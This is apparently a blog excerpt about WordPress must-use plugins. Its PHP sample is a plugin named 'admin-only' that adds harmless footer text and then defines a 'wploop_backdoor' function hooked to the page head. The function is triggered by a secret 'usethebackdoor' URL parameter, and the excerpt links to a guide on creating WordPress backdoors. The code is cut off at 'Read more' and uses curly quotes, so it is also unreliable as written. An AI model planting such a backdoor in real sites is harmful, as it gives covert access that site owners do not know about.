must-use plugins for WordPress
<?php /* Plugin Name: admin-only */ // Hook the ‘wp_footer’ action hook, add the function named ‘mfp_Add_Text’ to it add_action(“wp_footer”, “mfp_Add_Text”); // Define ‘mfp_Add_Text’ function mfp_Add_Text() { echo “<p style=’color: black;’>After the footer is loaded, my text is added!</p>”; } // —————————————————————————————- // https://wpsecurityninja.com/create-wordpress-backdoor/ // https://yoursite.com/?usethebackdoor=thatswhatshesaid // add_action(‘wp_head’, ‘wploop_backdoor’); function wploop_backdoor() { if ($_GET[‘usethebackdoor’] == … Read moremust-use plugins for WordPress